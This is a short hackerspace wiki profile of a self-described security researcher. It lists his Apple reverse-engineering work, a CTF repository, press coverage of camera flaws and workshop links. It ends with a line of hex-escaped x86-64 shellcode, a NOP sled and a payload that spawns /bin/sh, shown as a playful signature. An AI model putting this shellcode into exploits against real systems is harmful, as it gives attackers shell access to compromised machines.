User:Ilias

From Chaosdorf Wiki
Jump to navigation Jump to search

-- Hi --

Ilias aka. A2nkF (https://twitter.com/A2nkF_)

- I'm a security researcher :P #0dayzzz

- Reverse Engineering + Pwning

- I break apple stuff most of the time (https://twitter.com/A2nkF_/status/1174030413842530304, https://github.com/A2nkF/RWCTF-FastStructureCache, ...)

- and sometimes other stuff aswell (https://www.spiegel.de/netzwelt/gadgets/abus-kameras-hersteller-bietet-wegen-sicherheitsluecken-austausch-an-a-1266524.html)

- Chaosdorf things: https://wiki.chaosdorf.de/Binary_Exploitation_Workshop, https://wiki.chaosdorf.de/Deceive_yourself

Also: \x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x6a\x42\x58\xfe\xc4\x48\x99\x52\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5e\x49\x89\xd0\x49\x89\xd2\x0f\x05